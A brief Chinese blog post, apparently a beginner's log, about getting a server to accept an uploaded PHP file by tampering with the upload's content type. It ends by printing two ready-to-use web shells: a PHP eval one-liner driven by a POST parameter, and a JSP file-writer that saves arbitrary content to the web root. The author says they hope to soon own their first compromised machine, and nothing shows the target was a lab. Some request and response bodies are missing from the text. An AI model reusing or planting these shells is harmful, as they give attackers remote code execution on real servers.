乱发请求(后续)
1.发现
昨天盲目地请求了一番后,最终上传的文件服务器都认为是image/jpeg格式,把请求的文件类型改成txt/php(实际上是乱改的,没这种东西)也没用,返回依旧是认为图片。
但今天偶然直接把它改成“php”后返回的文件类型终于变了,于是开始研究。
2.开始乱发请求
发送如下请求:
服务器接收:
访问文件:
GET /223.jsp?f=1.txt&t=hello123123 HTTP/1.1
服务器返回的文件类型改变:
直接去掉文件类型:
再访问:
GET /666.php HTTP/1.1
服务器返回:
成功识别为php格式。
3.总结
并不清楚原理是什么,不过涉猎了点php,jsp入门知识。
希望很快能拥有自己的第一只可爱的小肉鸡,打破学了两年毫无成果的僵局。
4.相关文件
1.php
<?php @eval($_POST['pass']);?>
1.jsp
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 沫欢的小站!
wechat
alipay
